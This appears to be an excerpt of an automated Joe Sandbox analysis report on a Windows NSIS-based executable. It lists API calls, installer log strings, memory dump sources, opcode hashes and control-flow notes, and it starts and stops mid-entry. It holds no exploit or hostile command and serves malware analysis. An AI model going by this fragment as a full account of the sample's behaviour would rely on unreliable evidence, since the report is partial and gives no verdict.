                                                                                                • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                Strings
                                                                                                • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                • Jump: %d, xrefs: 00401602
                                                                                                • Rename: %s, xrefs: 004018F8
                                                                                                • detailprint: %s, xrefs: 00401679
                                                                                                • SetFileAttributes failed., xrefs: 004017A1
                                                                                                • Call: %d, xrefs: 0040165A
                                                                                                • Rename failed: %s, xrefs: 0040194B
                                                                                                • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                • BringToFront, xrefs: 004016BD
                                                                                                • Sleep(%d), xrefs: 0040169D
                                                                                                • Aborting: "%s", xrefs: 0040161D
                                                                                                • Rename on reboot: %s, xrefs: 00401943
                                                                                                • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                • API String ID: 2872004960-3619442763
                                                                                                • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                                Control-flow Graph: basic blocks 4054a5-405955 (graph rendering not reproduced; executed and not-executed blocks were marked in the original image)
                                                                                                APIs
                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                • ShowWindow.USER32(?), ref: 004054FE
                                                                                                • DestroyWindow.USER32 ref: 00405512
                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 3282139019-0
                                                                                                • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                                Control-flow Graph: basic blocks 405958-405c6a (graph rendering not reproduced; executed and not-executed blocks were marked in the original image)
                                                                                                APIs
                                                                                                  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                  • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                • API String ID: 608394941-2746725676
                                                                                                • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                                Control-flow Graph (graph rendering not reproduced)

                                                                                                APIs
                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                • lstrcatW.KERNEL32(00000000,00000000,232,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                • CompareFileTime.KERNEL32(-00000014,?,232,232,00000000,00000000,232,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004255E0,771B23A0,00000000), ref: 00404FD6
                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004255E0,771B23A0,00000000), ref: 00404FE6
                                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004255E0,771B23A0,00000000), ref: 00404FF9
                                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                • String ID: 232$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                                                • API String ID: 4286501637-2656113216
                                                                                                • Opcode ID: 64a557673ae3d0e019bdca1bc4e77ebfe7370d638d91dc23aa74aa5952768e1c
                                                                                                • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                • Opcode Fuzzy Hash: 64a557673ae3d0e019bdca1bc4e77ebfe7370d638d91dc23aa74aa5952768e1c
                                                                                                • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                                Control-flow Graph: basic blocks 4035b3-4037f6 (graph rendering not reproduced; executed and not-executed blocks were marked in the original image)
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                  • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                  • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                Strings
                                                                                                • soft, xrefs: 004036A1
                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                • Inst, xrefs: 00403698
                                                                                                • Null, xrefs: 004036AA
                                                                                                • Error launching installer, xrefs: 00403603
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                • API String ID: 4283519449-527102705
                                                                                                • Opcode ID: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
                                                                                                • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                • Opcode Fuzzy Hash: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
                                                                                                • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                • GetTickCount.KERNEL32 ref: 00403492
                                                                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                • wsprintfW.USER32 ref: 004034CE
                                                                                                • WriteFile.KERNELBASE(00000000,00000000,004255E0,00403792,00000000), ref: 004034FF
                                                                                                • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                Similarity
                                                                                                • API ID: CountFileTickWrite$wsprintf
                                                                                                • String ID: (]C$... %d%%$pAB$UB
                                                                                                • API String ID: 651206458-3730494346
                                                                                                • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(00445D80,004255E0,771B23A0,00000000), ref: 00404FD6
                                                                                                • lstrlenW.KERNEL32(004034E5,00445D80,004255E0,771B23A0,00000000), ref: 00404FE6
                                                                                                • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004255E0,771B23A0,00000000), ref: 00404FF9
                                                                                                • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004255E0,771B23A0,00000000), ref: 00406902
                                                                                                Similarity
                                                                                                • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                • String ID:
                                                                                                • API String ID: 2740478559-0
                                                                                                • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                                                                                APIs
                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                • GlobalFree.KERNEL32(006B0240), ref: 00402387
                                                                                                Similarity
                                                                                                • API ID: FreeGloballstrcpyn
                                                                                                • String ID: 232$Exch: stack < %d elements$Pop: stack empty
                                                                                                • API String ID: 1459762280-3464832006
                                                                                                • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

                                                                                                APIs
                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                Similarity
                                                                                                • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                • String ID: 232$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                • API String ID: 247603264-3569438738
                                                                                                • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                                                                                APIs
                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004255E0,771B23A0,00000000), ref: 00404FD6
                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004255E0,771B23A0,00000000), ref: 00404FE6
                                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004255E0,771B23A0,00000000), ref: 00404FF9
                                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                Strings
                                                                                                • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                Similarity
                                                                                                • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                • API String ID: 3156913733-2180253247
                                                                                                • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                Similarity
                                                                                                • API ID: CountFileNameTempTick
                                                                                                • String ID: nsa
                                                                                                • API String ID: 1716503409-2209301699

Control-flow Graph

Control-flow graph (executed / not executed blocks): 402175-40218b (call 401446, twice) -> 402198-40219d or 40218d-402197 (call 4062cf) -> 402198-40219d; 402198-40219d -> 4021aa-4021b0 (EnableWindow) or 40219f-4021a5 (ShowWindow); both -> 4030e3-4030f2.
APIs
• ShowWindow.USER32(00000000,00000000), ref: 0040219F
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
• EnableWindow.USER32(00000000,00000000), ref: 004021AA
Strings
Similarity
• API ID: Window$EnableShowlstrlenwvsprintf
• String ID: HideWindow
• API String ID: 1249568736-780306582
APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
• SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
APIs
• GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
APIs
  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
• CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
Similarity
• API ID: Char$Next$CreateDirectoryPrev
• String ID:
• API String ID: 4115351271-0
APIs
• SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                Similarity
                                                                                                • API ID: FilePointer
                                                                                                • String ID:
                                                                                                • API String ID: 973152223-0
                                                                                                • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
